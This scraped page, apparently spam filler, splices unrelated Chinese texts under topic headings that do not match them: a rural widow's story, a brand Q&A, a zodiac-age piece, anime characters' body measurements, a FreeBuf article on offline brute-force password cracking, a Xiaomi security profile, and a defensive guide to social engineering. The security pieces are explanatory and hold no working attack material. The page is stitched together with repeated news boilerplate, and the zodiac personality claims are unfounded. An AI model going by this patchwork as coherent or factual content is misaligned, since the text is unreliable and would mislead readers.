与乡村寡妇风流韵事

特朗普与普京通话谈合作:美三大股指均涨超3%,微软涨逾7%
打开

360浏览器
打开
CBA外援凌晨3点大闹隔离酒店 被曝光后道歉:希望得到谅解
打开

从比肩赵本山到阶下囚,魏三渐变人生的秘密,藏在父母的“破屋”
打开
特朗普与普京通话谈合作:美三大股指均涨超3%,微软涨逾7%
打开

360浏览器
打开
App内打开
乡村奇闻:一位漂亮小寡妇和留守男人的风流韵事
2017-06-12木易星座
只谈风月,不谈政事。微信号:pangzhujun007

乡村奇闻:一位漂亮小寡妇和留守男人的风流韵事

原创:庞祝君

我今年26岁,四年前,我在打工时认识了广西南宁一个小伙子,就嫁到了他那个偏僻的村子里,春节前结的婚,过年后我们夫妻俩就到广东打工了。

打工过程中,我有几个月身孕后便回到村里待产。就在这段时间,我丈夫一天早上出去上班,被一辆货车当场撞死。后来我把孩子生了下来,且顶住了许多人的劝说,毅然留在这个家里,养育儿子,赡养身体长年有病的家公家婆。

我老公只有一个姐姐,嫁到很远的山区里,回一趟娘家要半天工夫,于是,照顾老人的重任就落在我的身上。

我也曾出去打过工,但后来又回来了,回到村里耕田种地。其实种地也没什么,不就是犁田耙地辛苦点吗,这些在我的心目中是很简单的事情啊!

我没改嫁,说明我很传统,换到有的女人,可能早就改嫁了,我妈妈说,你一改嫁我就不认你这个女儿!

我不知道妈妈为什么有这种陈旧的观念,可她说,做女人还是传统一点的好,你再嫁,如果不幸福,还不如不嫁,所以我就留在这个家里,继续做我孩子的妈妈,做我公公婆婆的女儿。就凭这个,村里的人都说我是好人,都很尊重我,也没人敢欺负我。

可是,有一个男人闯入了我的生活。

我们这条村子,从村头到村尾有好几百米,我和他同住在村尾,而且住在村尾的都是几个留守妇女,只有他家是男人,因为他老婆外出打工了。由于我们村的地形都是梯田,不能机械化耕田收割,必须靠人力耕作,犁田耙地女人弄不动,所以我就请他做这些事情。

村尾的几个留守妇女,有时也吃醋,但凭我在村里的影响力,她们都不敢制造我的绯闻。

可是他不怕其他女人吃醋,一到农忙的时候,这些留守的妇女,她们都有外家的亲戚或请人出工钱来帮忙种地,可我就只能请他,他也很主动的帮助我。

我给过他工钱,但他不要,他说他就这个犁田耙地的命,收了钱,他一辈子也不安逸。他老婆出外打工后,面对两个孩子,他既当爹又当妈,做饭洗衣服带孩子,过去这都是女人的事,可这些现在全让他给摊上了。他最怕洗衣服,但又不得不洗。一次我过路看见他洗衣服,我就主动的说,以后我帮你洗吧!

后来,我就帮我洗衣服,还给他孩子检查作业,算是相互帮助吧!

有风言风语传到他老婆的耳朵里,说我跟他有见不得人的事,这话后来又传到他的耳朵里,我对他说,真不好意思,是我害了你,要不以后你不来帮我干活了,免得你老婆瞎猜疑,因为我是一个寡妇。

没有男人的女人最难熬的是晚上,这个时候我打电话约几个妇女一起打麻将、斗地主。有时晚上睡不着觉,躺在床上看电视,看到凌晨才睡着。

有人说我和他是奸夫淫妇,但我也不生气,因为我坐得很正。

我经常到他家里给孩子辅导作业,所以他老婆有时候打电话回来,我正在给孩子讲解孩子遇到的学习难题,每当这个时候,他老婆就不高兴,警告她老公不要对我太好,同时也叫我不要太过分。

我跟他来往几年,他为了我的农活,我为了他孩子的学习而相互帮助,始终没有暗示过什么,就连抛一个媚眼都没有,感觉像兄妹。

因为我是一个很正统的女人,很守妇道,他对我的笑几乎都是当着他孩子的面笑的,平时干农活,干完了他就回家了,没有很多的瓜葛,所以,没有像人们所说的那样寡妇门前是非多!

我们村在外打工有一对离婚了,说出来都不好意思,是女的不守妇道引起的,那女的不知道是做了人家的小三还是二奶什么的,男的拿出10万给她老公就拜拜了,像我这样的傻女不是说我们村,就是整个社会也真的不多。

而像他那样的留守男人也许更少,几年来助人为乐为了我一个小寡妇,而没有半点的非分之想。

故事讲完了,这就是我跟这个男人的“风流韵事”。(注明:插图来自网络,图文无关)

[温馨提示]:

评论:文章末尾右下角已开启了评论功能,请各位多提宝贵意见

打开360浏览器阅读全文

360浏览器,你关心的都在这里
0daybank

三个箭头是什么牌子

特朗普与普京通话谈合作:美三大股指均涨超3%,微软涨逾7%
打开

360浏览器
打开
CBA外援凌晨3点大闹隔离酒店 被曝光后道歉:希望得到谅解
打开

从比肩赵本山到阶下囚,魏三渐变人生的秘密,藏在父母的“破屋”
打开
特朗普与普京通话谈合作:美三大股指均涨超3%,微软涨逾7%
打开

360浏览器
打开
App内打开
三个向下箭头的品牌
2019-01-14问答 / 查看原文
三个向下箭头的品牌
创建于 2015-07-02

韩国三个箭头朝下的是什么牌子
1个回答
wjdddc

2015-07-03

日本 ,DESCENTE,(迪桑特)。

360浏览器,你关心的都在这里
0daybank

76岁属什么生肖

特朗普与普京通话谈合作:美三大股指均涨超3%,微软涨逾7%
打开

360浏览器
打开
CBA外援凌晨3点大闹隔离酒店 被曝光后道歉:希望得到谅解
打开

从比肩赵本山到阶下囚,魏三渐变人生的秘密,藏在父母的“破屋”
打开
特朗普与普京通话谈合作:美三大股指均涨超3%,微软涨逾7%
打开

360浏览器
打开
App内打开
年龄与生肖 2019年76岁属什么生肖

第一星座
快传号 | 2019-01-22
关注
  人的一生有太多的心酸,太多的无奈,无论你喜欢与否,你都得去接受,我们这一生从妥协开始,我们一出生就注定了我们的生肖,别无选择,到后面生活的妥协,这就是所谓的长大吧!那么本期的年龄与生肖为大家揭晓2019年76岁属什么生肖?

  2019年虚岁76岁属什么生肖:属羊、属猴  2019年周岁76岁属什么生肖:属马、属羊  2019年虚岁76岁的人生日:(即出生于公历1944年1月1日—1944年12月31日)  1944年1月1日—1944年1月24日:农历癸未年(羊年)  1944年1月25日—1944年12月31日:农历甲申年(猴年)

  2019年周岁76岁的人生日:(即出生于公历1943年1月1日—1943年12月31日)  1943年1月1日—1943年2月4日:农历壬午年(马年)  1943年2月5日—1943年12月31日:农历癸未年(羊年)  2019年虚岁76岁属什么生肖:属羊、属猴  2019年周岁76岁属什么生肖:属马、属羊

  2019年76岁属猴人有较强的进取心,性格倔强,才智高且具优秀的头脑,行动活泼好动且伶俐,但是2019年76岁属猴人有自以为是的毛病,所以常导致错误失败。  2019年76岁属羊人性格温顺,人际交往圆融随和,做事稳重谦卑,给人以靠得住的感觉,但是2019年76岁属羊人个性主张淹没在随大流的队伍里,难得彰显出来个人的特点。  2019年76岁属马人各个方面天赋极高,领悟力也强,头脑和四肢敏捷,有觉察力自由奔放,但是2019年76岁属马人有半途而废的习惯,盛气凌人,自制力欠佳。

打开360浏览器阅读全文

360浏览器,你关心的都在这里
0daybank

牧野遥

特朗普与普京通话谈合作:美三大股指均涨超3%,微软涨逾7%

360浏览器

CBA外援凌晨3点大闹隔离酒店 被曝光后道歉:希望得到谅解

从比肩赵本山到阶下囚,魏三渐变人生的秘密,藏在父母的“破屋”

特朗普与普京通话谈合作:美三大股指均涨超3%,微软涨逾7%

360浏览器

App内打开

后宫动漫姐妹之牧野四姐妹

汽车改装看点快传号 | 2018-09-23

在后宫动漫中,姐妹属性的不在少数,今天我们来一起分享《牧野一家》中的四姐妹,至于具体是什么番作,如果有不知道的,可以去询问你熟悉的那些绅士们

牧野遥

姓名:牧野遥

排行:长女

三围:B96/ W58/ H88

声优:计名荚香

作为长女牧野遥一直都很照顾家里,属于明朗的元气少女,在牧野一家中,身材也是相当的出众,很会照顾妹妹们的感受,有点小毛病,会说着“可能会如何如何”这样的牵着妹妹们走。有着草率、而且无论发生什么都若无其事的性格。

牧野枣

姓名:牧野枣

排行:次女

三围:B73/ W51/ H68

声优:五十岚裕美

牧野枣在学校是剑道部的成员,虽然在姐妹中的个子是最矮的,但是她的气势非常的强劲,身材娇小但擅长运动,因为想穿华丽的衣服,而对自己只能穿小孩衣服的事十分苦恼。

牧野晶

姓名:牧野晶

排行:三女

三围:B92/ W56/ H91

声优:河原木志穗

可以说牧野晶是除了长女之外身材最好的人,性格比较的温顺,学习成绩优异,在学校并没有参加社团活动,再加上她比较的擅长做料理,性格也相对的沉稳,可以说是四姐妹中比较类似大和抚子这样的女性。

牧野冬

姓名:牧野冬

排行:四女

三围:B80/ W53/ H76

声优:梅原千寻

可以说牧野冬是四姐妹中忍耐力最好的一个人,无论愉快和不愉快的事情都会默默藏在心中,甚至在母亲去世的时候,心中留下了阴影。在表面上有着开朗懂事的好性格,不过对于二姐牧野枣让她感觉难以对付。

总得来说,牧野家的四姐妹虽然在性格上都各有不同,但是最终被攻略都是一致的,我一直认为,这家的四姐妹的过人之处就是,绅士们在观影的时候,可以感觉到不同性格和身材所表现出来的景象都是不同的。

打开360浏览器阅读全文

0daybank

暴力破解

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
微软:暴力破解面前,增强密码复杂性基本没用dawner专栏作者2014-12-02金币奖励+10共617725人围观 ,发现 35 个不明物体WEB安全数据安全
password.jpg

我们都痛恨密码,然而不幸的是在当下及可以看见的未来里,账户登录等在线认证操作的主要方法还是需要使用密码的。密码认证有时确实比较烦人,尤其是一些网站为了密码安全性,要求我们在设置密码时必须包含大小写字母、数字或特殊字符。

微软发布的最新研究报告称:增强密码复杂性基本是没有任何意义的。在本文中,我将简要分析一下微软的理论,并且与大家探讨下两个新的密码安全解决方案。

什么是暴力破解?

暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。更多信息请点我

增强密码复杂性基本没用

在密码强大到无视社工字典的攻击后,黑客采取的攻击称为暴力破解。这类暴力破解又分两种:在线破解和离线破解。

在线破解时,黑客通常使用与用户正常操作时相同的应用接口(比如登录时用到的web接口),因而可能被某些安全防控规则限制。然而由于离线破解的必要条件是黑客已经获取了密码文件,因而黑客们进行密码暴力猜解时通常是毫无忌惮、无所限制的。

微软安全研究人员发现,通过在线破解所尝试直至成功的次数最高约为100万次,而离线破解则达到了10亿次之多。

因此一个不太复杂的百万次猜解级别的密码“tincan24”与一个10亿次猜解级别的密码“7Qr&2M”相比,他们对于在线破解来说都是强密码,而通过离线破解则都不堪一击。同时后者还更加难以记住。

这就告诉我们,在离线暴力破解攻击面前,增强密码复杂性基本没用。

1211.jpg

当密码文件泄露后

为了对抗密码文件泄露后的离线破解攻击,我们需要做一些防护措施。

在微软的报告里提到一个通用解决方案:
将每个密码进行加密,然后将密钥储存在硬件安全模块(HSM)之中。因为HSM并没有提供密钥的外部访问接口,所以想要解密密文,只能通过应用程序走正常流程,那样即使拿到了密文也没有太大用处。
两个创新性防护方案
对于防密码文件泄露,国外安全研究者提出两个创新性的解决方案:

1、在Derbycon 2014大会上,Benjamin Donnelly和Tim Tomes提出了他们的“球链”(BAC)解决方案。BAC提供了一种方法,可以人工填充密码文件从而增加文件大小。当然,密码数据会安全地存放在文件里不会丢失,这样一来密码的猜解难度增大了许多。打个比方,黑客想要在线猜解一个2TB大小的密码文件,至少得花费1个月的时间。这么长的时间,再加上如此大的数据发送量,黑客的攻击有非常大的可能性会暴露。

2、以色列某新兴公司Dyadic,向公众展示了它的分布式安全模块(DSM)。DSM运用了最先进的分布式计算(MPC)加密技术,通过把每组密码进行分割后,分布式存储在多个服务器上。黑客想要破解密码,需要遍历多个服务器。由于各服务器有着不同的访问凭证,甚至操作系统也可能不一样,这会大大增加黑客的破解难度。

FreeBuf结语

把密码保护的重任压在用户身上是不科学的,作为安全研究人员,我们显然不能一味地要求用户增加密码复杂度。而诸如使用对称/非对称算法存储密码、加盐(salt)、加密机的使用似乎都是老生常谈,技术也并不新鲜。

有没有一些新的技术或方式可以提高密码及密码存储安全性?上文中国外的安全研究者抛出了两种方法,国内的同志们的呢?欢迎在本文评论中讨论和交流。

[参考来源securityweek,译/FreeBuf小编dawner,转载请注明来自FreeBuf.COM]

dawner
dawner
289 篇文章
等级: 9级
||
相关推荐

Github账号遭大规模暴力破解攻击

如何利用查表瓶颈,对抗口令Hash破解

全能暴力破解测试工具——Patator v0.5

业务逻辑漏洞探索之暴力破解

如何破解12位+字符的高强度密码?

关于口令强度等级的设计

如何找到SQL注入中的盐

在多GPU系统上使用hashcat进行密码破解

这些评论亮了

whitemonty(4级)这家伙很懒,就是不肯写个人说明!回复
吓得我把密码改回123456
)33(亮了

AH回复
爲什麽不說增加密碼複雜性對的作用?
)7(亮了

dawner(9级)黎明已经过去,黑暗就在眼前!回复
@ AH 可以脑补联想下辩论赛~一般都是单向论证的 :mrgreen:
)6(亮了

dawner(9级)黎明已经过去,黑暗就在眼前!回复
@ 我是来捣乱的 各种认证,找一个不可仿冒的认证感觉相对靠谱些。。
)6(亮了

鹿人饼回复
@ dawner 到了生物密码时代数据库安全就变得至关重要了,一旦被窃或者泄露由于其唯一性真是亡羊补牢都不知从何处下手……
)6(亮了
发表评论已有 35 条评论

AH 2014-12-02回复1楼
爲什麽不說增加密碼複雜性對的作用?

亮了(7)

dawner 专栏作者(9级)黎明已经过去,黑暗就在眼前! 2014-12-02回复
@ AH 可以脑补联想下辩论赛~一般都是单向论证的 :mrgreen:

亮了(6)

干掉你 (1级) 2014-12-02回复2楼
不切实际,大大增加成本。。

亮了(5)

dawner 专栏作者(9级)黎明已经过去,黑暗就在眼前! 2014-12-02回复
@ 干掉你 技术总是在不断进步的,总会有成本和价值平衡的那天 :mrgreen:

亮了(5)

我是来捣乱的 2014-12-02回复3楼
密码基本已死

考虑信任设备提供的安全凭证,以前是retina,fingerprint,palm,什么的,现在可以考虑未破解越狱的手机/移动设备作为凭证,被盗了什么的,另说

亮了(3)

dawner 专栏作者(9级)黎明已经过去,黑暗就在眼前! 2014-12-02回复
@ 我是来捣乱的 各种认证,找一个不可仿冒的认证感觉相对靠谱些。。

亮了(6)

liaoxj2046 (2级) 2014-12-03回复
@ dawner 比如像认证过的客户端证书,像网银登录用的U盾那类,就可以用来做安全登录。像这个网站就是用的安全证书登录https://login.wosign.com/login.html 跟密码比,安全系数高很多。

亮了(5)

huachishi (3级) 2014-12-02回复4楼
到底是要怎样。。。

亮了(5)

He1en的爸爸 2014-12-02回复5楼
生物密码是趋势

亮了(5)

dawner 专栏作者(9级)黎明已经过去,黑暗就在眼前! 2014-12-02回复
@ He1en的爸爸 同意此观点。。

亮了(4)

鹿人饼 2014-12-02回复
@ dawner 到了生物密码时代数据库安全就变得至关重要了,一旦被窃或者泄露由于其唯一性真是亡羊补牢都不知从何处下手……

亮了(6)

liaoxj2046 (2级) 2014-12-03回复
@ 鹿人饼 目前的生物密码应用,也就用在电影里了,要普及给大众,还有段时间呢~

亮了(2)

terry2656590 (1级) 2014-12-02回复6楼
要在安全性和操作性中间找到一个平衡点,增加用户操作性有时候适得其反。

亮了(3)

dawner 专栏作者(9级)黎明已经过去,黑暗就在眼前! 2014-12-02回复
@ terry2656590 对啊,一味地追求某个极端都不好

亮了(3)

kor1989 2014-12-02回复7楼
抛弃密码验证,采取其他方案。

亮了(3)

bilibili 2014-12-02回复8楼
弱弱的问一下:”用户名和密码就一定要加密密码吗? “

————->>”那你觉得呢?“

亮了(1)

dawner 专栏作者(9级)黎明已经过去,黑暗就在眼前! 2014-12-02回复
@ bilibili 感觉还是加下密放心些。。防止猪一样的队友。。

亮了(2)

小糊涂笙 2014-12-02回复9楼
合作打击恐怖分子是良策啊

亮了(2)

Lumia-ff 2014-12-02回复10楼
哈哈

亮了(0)

ncstc 2014-12-02回复11楼
好吧

亮了(0)

李铁军 2014-12-02回复12楼
双步验证成为必然之选,开通之后,密码简单或复杂都无所谓了。//: 酷

//:决定密码强度的因素包括复杂度和长度,而密码长度对于密码强度的影响更为明显,因此复杂密码不如长密码。之前我写了这篇文章来重新定义当前的密码安全标准( )

亮了(0)

王小馨馨xin 2014-12-02回复13楼
我要网购了拜拜

亮了(1)

iOSDever 2014-12-02回复14楼
对,我就说这个研究怪怪的,原来是离线//: 在线破解时密码复杂点还是有好处,当密码猜解多次错误时禁止此ip猜解效果更好。离线就没什么好说的了//:就国内的网络安全现状来说,增强密码的复杂程度还是有用的……当然,对明文保存密码的网站无效……

亮了(0)

Cyanlover 2014-12-02回复15楼
嗨,假呗儿没得我们也

亮了(0)

Arctic丶z 2014-12-02回复16楼
只要时间允许,当然任何强度的密码在暴力破解下都能够解开。但是并非所有人都有这样的设备与能力来进行破解。

亮了(0)

CAKETEASE 2014-12-03回复17楼
就是咯挖鼻屎

亮了(0)

Hundred_Lee 2014-12-03回复18楼
拜拜

去屎吧

亮了(1)

whitemonty (4级)这家伙很懒,就是不肯写个人说明! 2014-12-04回复19楼
吓得我把密码改回123456

亮了(33)

凌伟同学 (1级) 2014-12-04回复20楼
话说题主知道10亿次的10亿次猜解较好的CPU大概要跑多久么

亮了(0)

不愿透露性别的王先生 2014-12-05回复21楼
我想把密码改成:灪麣鸾鹂鲡驫饢籱癵爨,要怎么操作呢?急急急!!!在线等.

亮了(4)

玩水族网 2014-12-27回复22楼
我感觉 应该用中文当做密码~应该不错

亮了(0)

Little Monk (1级) 2015-01-09回复23楼
密码的次数限制怎么破,还有qq如何暴力破解

亮了(0)

holycake (1级) 2015-05-23回复24楼
斷章取義以達到嘩眾取寵的目的嗎……在硬件設備越來越發達的當下離線破解自然較容易,不過仍需要很大量的時間和硬件成本。

亮了(0)

HundredLee 2014-12-03回复25楼
拜拜

去屎吧

亮了(0)

ebiann 2014-12-03回复26楼
就是咯挖鼻屎

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
dawner
dawner专栏作者

黎明已经过去,黑暗就在眼前!

289
文章数
421
评论数
3
关注者

关注
最近文章
celery超时机制小结
2019.10.14

浅谈Git监控平台
2019.07.30

浅谈安全运维优化
2019.07.19

浏览更多
相关阅读
安全应急响应 | 如何从内核中直接获取隐藏的进程信息博彩巨头BetVictor泄露了自己内部系统的密码列表44CON议题《攻击 VxWorks:从石器时代到星际》探究ATBroker.exe:一个被病毒利用的微软进程利用Flash漏洞病毒分析报告
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
已结束

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

小米安全中心

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
登录
注册
小米安全中心认证厂商TA的专栏认证作者等级:4 级注册日期:2014年10月15日认证信息:小米公司安全技术品牌
2

关注者

6

金币

他的文章
他的点评
他的关注
关注他的
标题时间操作
IoT上SSL安全开发小结 专栏2020-03-31
浅谈智能门锁离合器安全设计 专栏2020-03-20
个人信息保护之TrustArc合规认证 专栏2020-03-09
GDPR实践 | 隐私成熟度模型PM2(一) 专栏2020-02-28
Exploit Spring Boot Actuator之Spring Cloud Env学习笔记 WEB安全2020-02-02
小米安全团队招新又双叒叕开始啦! 安全招聘2019-12-17
11.21 第三届小米IoT安全峰会 只等你来 活动2019-11-15
漏洞扫描技巧之Web漏洞扫描器研究 WEB安全2019-09-07
绕过Android域名白名单校验的方法 WEB安全2019-07-30
小米云服务专项测试,严重漏洞奖励可达40000元! 企业资讯2019-07-19
招人啦!小米安全中心欢迎你的加入! 安全招聘2019-06-19
招人啦!2019小米安全团队招聘季启动! 安全招聘2019-04-19
招人啦!2019小米安全团队招聘季启动! 企业资讯2019-04-17
小米安全2018秋招正式启动 安全招聘2018-09-10
小米安全诚邀优秀的你加入 安全招聘2018-06-19
小米安全中心招聘 安全招聘2017-01-19

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank

社会工程学

FB招聘站
分类阅读
专栏
公开课
企业服务
用户服务
手机版
搜索
投稿
登录
注册
防范社会工程学攻击的简单技巧与姿势明明知道2015-05-06共662972人围观 ,发现 14 个不明物体网络安全
社会工程学的方方面面

互联网是人、组织机构与电脑之间相互联系的迷宫。而最简单的攻击方式便是找出关系中的薄弱环节。通常人是这三者中最弱的一环,因此也成为了攻击进入任何组织电脑网络最简单的方式。

现代黑客已经将攻击目标由组织机构的系统转为人类的操作系统(Human Operating System)。对个体攻击需要一套不同的工具和从蛮力转变为策略的技巧,而社会工程学利用人的弱点如人的本能反应、好奇心、信任、贪便宜等弱点进行诸如欺骗、伤害等危害手段,获取自身利益等等都为黑客攻击提供了极大的方便。

FreeBuf百科:社会工程学

社会工程学,准确来说,不是一门科学,而是一门艺术和窍门的方术。社会工程学利用人的弱点,以顺从你的意愿、满足你的欲望的方式,让你上当的一些方法、一门艺术与学问。说它不是科学,因为它不是总能重复和成功,而且在信息充分多的情况下,会自动失效。社会工程学的窍门也蕴涵了各式各样的灵活的构思与变化因素。

现实中运用社会工程学的犯罪很多。短信诈骗如诈骗银行信用卡号码,电话诈骗如以知名人士的名义去推销诈骗等,都运用到社会工程学的方法。近年来,更多的黑客转向利用人的弱点即社会工程学方法来实施网络攻击。利用社会工程学手段,突破信息安全防御措施的事件,已经呈现出上升甚至泛滥的趋势。

且不论形式及内容,社会工程攻击的成功很大程度上取决于人类在尝试谨慎分析不同情况时出现的盲点。实际上,网络安全就是知道在任何给定情况下你可以将机密信息托付给谁。保持警惕性以及避免在任何情况下根据表面想象进行判断可以让你在防御社会攻击中更胜一筹。

有哪些常见的社会工程学攻击?

社会工程学攻击是以不同形式和通过多样的攻击向量进行传播的。这是一个保持不断完善并快速发展的艺术。但一些社会工程攻击误区仍然时有出现,如下所示。

伪造一封来自好友的电子邮件:这是一种常见的利用社会工程学策略从大堆的网络人群中攫取信息的方式。在这种情况下,攻击者只要黑进一个电子邮件帐户并发送含有间谍软件的电子邮件到联系人列表中的其他地址簿。值得强调的是,人们通常相信来自熟人的邮件附件或者是链接,这便让攻击者轻松得手。

在大多数情况下,攻击者利用受害者账户给你发送电子邮件,声称你的“朋友”因旅游时遭遇抢劫而身陷国外。他们需要一笔用来支付回程机票的钱,并承诺一旦回来便会马上归还。通常,电子邮件中含有如何汇钱给你“被困外国的朋友”的指南。

钓鱼攻击:这是个运用社会工程学策略获取受害者的机密信息的老把戏了。大多数的钓鱼攻击都是伪装成银行、学校、软件公司或政府安全机构等可信服务提供者,例如FBI。

通常网络骗子冒充成你所信任的服务提供商来发送邮件,要求你通过给定的链接尽快完成账户资料更新或者升级你的现有软件。大多数网络钓鱼要求你立刻去做一些事,否则将承担一些危险的后果。点击邮件中嵌入的链接将把你带去一个专为窃取你的登录凭证而设计的冒牌网站。

钓鱼大师们另一个常用的手段便是给你发邮件声称你中了彩票或可以获得某些促销商品,要求你提供银行信息以便接收彩金。在一些情况下,骗子冒充FBI表示已经找回你“被盗的钱”,因此需要你提供银行信息一边拿回这些钱。

诱饵计划:在此类型的社会工程学阴谋中,攻击者利用了人们对于例如最新电影或者热门MV的超高关注,从而对这些人进行信息挖掘。这在例如Bit torrent等P2P分享网络中很常见。

另一个流行方法便是以1.5折的低价贱卖热门商品。这样的策略很容易被用于假冒eBay这样的合法拍卖网站,用户也很容易上钩。邮件中提供的商品通常是不存在的,而攻击者可以利用你的eBay账户获得你的银行信息。

主动提供技术支持:在某些情况下,攻击者冒充来自于微软等公司的技术支持团队,回应你的一个解决技术问题的请求。尽管你从没寻求过这样的帮助,但你会因为自己正在微软产品并存在技术问题而尝试点击邮件中的链接享用这样的“免费服务”。

一旦你回复了这样的邮件,便与想要进一步了解你的计算机系统细节的攻击者建立了一个互动。在某些情况下攻击者会要求你登录到“他们公司系统”或者只是简单寻求访问你的系统的权限。有时他们发出一些伪造命令在你的系统中运行。而这些命令仅仅为了给攻击者访问你计算机系统的更大权限。

如何免受社会工程学攻击?

钓鱼攻击

当心来路不明的服务供应商等人的电子邮件、即时简讯以及电话。在提供任何个人信息之前验证其可靠性和权威性。

缓慢并认真地浏览电子邮件和短信中的细节。不要让攻击者消息中的急迫性阻碍了你的判断。

自学。信息是预防社会工程攻击的最有力的工具。研究如何鉴别和防御网络攻击者。

永远不要点击??来自未知发送者的电子邮件中的嵌入链接??。如果有必要就使用搜索引擎寻找目标网站或手动输入网站URL。

永远不要在未知发送者的电子邮件中下载附件。如果有必要,可以在保护视图中打开附件,这个在许多操作系统中是默认启用的。

拒绝来自陌生人的在线电脑技术帮助,无论他们声称自己是多么正当的。

使用强大的防火墙来保护你的电脑空间,及时更新杀毒软件同时提高垃圾邮件过滤器的门槛。

下载软件及操作系统补丁,预防零日漏洞。及时跟随软件供应商发布的补丁同时尽可能快地安装补丁版本。

关注网站的URL。有时网上的骗子对URL做了细微的改动,将流量诱导进了自己的诈骗网站。

不要幻想不劳而获。如果你从来没有买过彩票,那你永远都不会成为那个中大奖的幸运儿。如果你就没有丢过钱,那为什么还要接受来自FBI的退款呢?

不幸成了社会工程攻击的受害者,该怎么办?

由于社会工程攻击的温柔属性,大多数受害者都不知道他们已经被攻击了,而可能要耗费几个月的时候才能发现这个安全漏洞。一旦你怀疑自己是社会工程攻击的受害者时,你首先要做的就是重设一个密码。

为你的所有账户创建一个新的强密码,并且要确保你的新密码与你的家人无关,因为攻击者可能知道很多关于你和你的家人的信息。其次,联系你的银行,仔细检查你的财务报表。最后,可以考虑报告有关职能机构,以避免潜在发生的身份盗窃及冒名邮件诈骗。

总结

社会工程学攻击这个老掉牙的骗局随着时间的推移变得更好也更狡猾了。黑客将持续使用这一攻击方式,并年复一年地得到不俗的回报。防范社会工程学攻击就必须要知道在网上何时该相信何人。在你提供个人信息前请谨慎地分析每一个情况。更为重要的是,在网络上不要过于贪婪了。当一笔交易实在是太“划算”的时候,请三思而后行!

* 参考来源hackread,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

更多精彩# 社会工程学
明明知道
明明知道
131 篇文章
等级: 8级
||
相关推荐

电子邮件安全问题分析(一)

2019年最大的网络威胁:电子商务网络攻击的崛起

电子邮件安全问题分析(二)

网络攻击瞄准个人银行,谈谈5个典型攻击手段

社交媒体和骗局:赛门铁克发布2015网站安全威胁报告

BEC诈骗横行,企业员工如何防钓鱼?

当微信遇上社会工程学,明枪易躲暗箭难防

卡巴斯基2019年Q1垃圾邮件与钓鱼攻击统计分析

这些评论亮了

Mr_ettercap回复
对于刚刚成年的我来说,社会工程学基本无效。没有女朋友,没有存款,更不会有人找我借钱
)19(亮了
发表评论已有 14 条评论

Mr_ettercap 2015-05-06回复1楼
对于刚刚成年的我来说,社会工程学基本无效。没有女朋友,没有存款,更不会有人找我借钱

亮了(19)

TMS (1级) 2015-05-06回复2楼
专业社工师表示,很难预防。。。成功率依然还是比较高的

亮了(5)

M 2015-05-06回复
@ TMS 肿么才能称谓专业社工师呢

亮了(3)

jacker (6级)Ubuntu Arch Vim爱好者 2015-05-06回复3楼
对于不会操作电脑的不用担心社工的

亮了(3)

yege0201 (3级) 2015-05-06回复4楼
比如看到这篇文章的标题然后点了进来,其实就已经证明被社会工程学了(但并不属于攻击)~这就是利用了人们的好奇心,最常见的就是“标题党”

社会工程学不好防,但社会工程学攻击还是能够通过加强意识及时止损的~

亮了(5)

换个马甲去看你 2015-05-06回复5楼
朋友此言差矣,有可能最终目标不是你,但你绝对有可能是其中一环

亮了(2)

打到资本主义 2015-05-06回复6楼
楼主妖言惑众,小心我社你~国内各大黑阔拿手的就是”社工”

亮了(0)

夜尽天明 (6级)千秋邈矣独留我,百战归来再读书 2015-05-06回复7楼
河蟹表示不服

亮了(0)

夜尽天明 (6级)千秋邈矣独留我,百战归来再读书 2015-05-06回复8楼
~~~河蟹怎么变河蟹了

亮了(0)

父亲 (4级) 2015-05-06回复9楼
社工,防不了。 完。

亮了(1)

丶苏晨c 2015-05-07回复10楼
[挖鼻]

亮了(0)

ban1sh 2015-05-07回复11楼
这叫探测案例;-)

亮了(0)

闭关中的雾玥_vulpes殿下 2015-05-07回复12楼
现在都是失败案例吧

亮了(0)

hawkeye 2017-07-15回复13楼
@ Mr_ettercap ,我是你远方亲戚,借我10000快,2天就还你

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登录?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
明明知道
明明知道

be kind to one another

131
文章数
53
评论数
0
关注者

关注
最近文章
如何证明你是“比特币之父”中本聪?
2016.04.14

供应链安全问题再现:一个药品管理系统怎么会有1400个漏洞?
2016.04.04

中国黑客在Pwn2Own 2016上是怎样一种存在?
2016.03.17

浏览更多
相关阅读
Google Hacking:教你找女神当微信遇上社会工程学,明枪易躲暗箭难防《通天神偷》之溜进某电力公司服务器Camelishing:成熟的社会工程学工具技术分享小心图片泄露你的信息
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
文章目录

活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
已结束
3月

合规、技术、实践,从隐私保护走向数据安全
已结束
3月

冠军选手帮你把CTF知识点各个击破
已结束
3月

CTF之web安全入门
